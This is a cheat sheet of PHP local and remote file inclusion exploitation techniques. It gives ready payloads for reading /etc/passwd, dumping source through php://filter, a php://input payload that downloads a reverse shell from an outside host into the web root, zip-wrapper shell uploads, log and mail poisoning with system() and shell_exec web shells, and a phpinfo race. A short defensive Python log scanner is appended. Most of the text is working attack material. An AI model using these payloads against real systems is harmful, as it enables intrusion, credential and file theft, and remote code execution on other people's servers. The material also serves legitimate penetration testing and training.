PHP - LFI and RFI

Methods for exploiting PHP LFI/RFI:

1) Basic Local File Inclusion and Remote File Inclusion
2) Null Byte
3) Base64 Encoded
4) PHP Input Wrapper
5) PHP Zip Wrapper
6) proc/self/environ
7) Log File Contamination
8) Email Reverse Shell
9) phpinfo LFI

Basic Local File Inclusion and Remote File Inclusion

http://example.com/script.php?page=../../../../../../../../etc/passwd

http://example.com/script.php?language=/etc/passwd

Null Byte

# On PHP 5.3 and below, you can use a Null Byte (%00) to stop PHP from appending the .php extension
http://example.com/script.php?language=/etc/passwd%00

# Another way to deal with this is to append a ? (question mark) so that the rest of the string is interpreted as a query parameter.
# Also try %2500  
http://example.com/script.php?language=/etc/passwd?

Base64 Encoded

index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd

index.php?page=php://filter/convert.base64-encode/resource=index.php

PHP Input Wrapper - POST Example 1:

http://192.168.183.128/fileincl/example1.php?page=php://input
# POST Data would be something like this:
<? system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php');?>  

# After uploading execute the reverse shell at:
http://192.168.183.129/shell.php

Example 2:

PHP Zip Wrapper

The zip wrapper processes uploaded .zip files server side, allowing a penetration tester to upload a zip file through a vulnerable file upload function and then leverage the zip wrapper via an LFI to execute its contents. A typical attack example would look like:

1. Create a PHP reverse shell
2. Compress it to a .zip file
3. Upload the compressed shell payload to the server
4. Use the zip wrapper to extract the payload using:

php?page=zip://path/to/file.zip%23shell

5. The above extracts the file named shell from the zip archive; if the server does not append .php, name the file shell.php inside the archive instead

proc/self/environ

/proc/self/environ
# If the above works and we have access to the file... then you can do this via the User Agent:  
User-Agent: <?php echo "Hello"; ?>

Log File Contamination

nc -nv 10.10.10.35 80
<?php echo shell_exec($_GET['cmd']);?>

# To execute it:
http://10.10.10.7/vuln.php?page=../../../../../../../../../var/log/apache2/access.log%00&cmd=ipconfig  

Email Reverse Shell

 telnet 10.10.10.7 25
 EHLO ippsec.beep.htb
 VRFY asterisk@localhost
 ### if successful, then:
 mail from:pwned@haha.io
 rcpt to: asterisk@localhost
 data
 Subject: You have been pwned
 <? echo system($_REQUEST['ipp']); ?>

.

# Don't forget the . (dot) above
# Then:
 http://10.10.10.7/vuln.php?page=../../../../../../../../../var/mail/asterisk%00&ipp=whoami  

phpinfo() LFI

1 - Check if upload is enabled

 GET /phpinfo.php HTTP/1.1

2 - Execute the POST with the Content-Type header set and check the phpinfo output for the PHP variables. Below are two examples.

Example 1 from the documentation:

Example 2 from IPPSEC - POISON

3 - The script is located at PayloadsAllTheThings - PHP LFI path.

# Must change:
 - PAYLOAD
 - URI
 - [tmp_name] => TO [tmp_name] =&gt; (the phpinfo() page is HTML-encoded, so the script has to search for the encoded form of =>)

4 - Start the listener and get it done
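As an added defender-side example, not part of the original cheat sheet: a small Python scanner that decodes the request target of Apache combined-format access log lines (repeatedly, so a double-encoded %2500 is still seen as a null byte) and flags the LFI/RFI indicators covered above. The log lines are constructed for illustration and the indicator list is an assumption, not a complete signature set.

```python
import re
from urllib.parse import unquote

# Request-level indicators for each technique on this page (label, pattern).
INDICATORS = [
    ("traversal",      re.compile(r"(?:\.\./){2,}")),
    ("null_byte",      re.compile("\x00")),
    ("php_filter",     re.compile(r"php://filter", re.I)),
    ("php_input",      re.compile(r"php://input", re.I)),
    ("zip_wrapper",    re.compile(r"zip://", re.I)),
    ("proc_environ",   re.compile(r"/proc/self/environ")),
    ("log_or_mail",    re.compile(r"/var/(?:log|mail)/")),
    ("remote_include", re.compile(r"=(?:https?|ftp)://", re.I)),
]

def fully_decode(s, rounds=3):
    # Decode repeatedly so double encoding (%2500 -> %00 -> NUL) is not missed.
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def classify_request(target):
    # Return the labels whose pattern matches the decoded request target (path?query).
    decoded = fully_decode(target)
    return [label for label, rx in INDICATORS if rx.search(decoded)]

# Combined-format access log line: client, timestamp, request line, status.
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /script.php?page=../../../../etc/passwd%2500 HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /vuln.php?page=zip://uploads/a.zip%23shell HTTP/1.1" 500 0',
]

def scan_access_log(lines):
    # Return (client, target, status, labels) for every request that trips an indicator.
    hits = []
    for m in filter(None, map(LOG_LINE.match, lines)):
        labels = classify_request(m.group("target"))
        if labels:
            hits.append((m.group("ip"), m.group("target"), m.group("status"), labels))
    return hits
```

A 200 status on a flagged request (readable /etc/passwd, base64 source disclosure) deserves more urgency than a 500; correlating by client across the whole log shows the probing sequence.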

References:

- https://secf00tprint.github.io/blog/payload-tester/lfirfi/en
- https://www.hackingarticles.in/5-ways-exploit-lfi-vulnerability/
- https://highon.coffee/blog/lfi-cheat-sheet/
- https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/
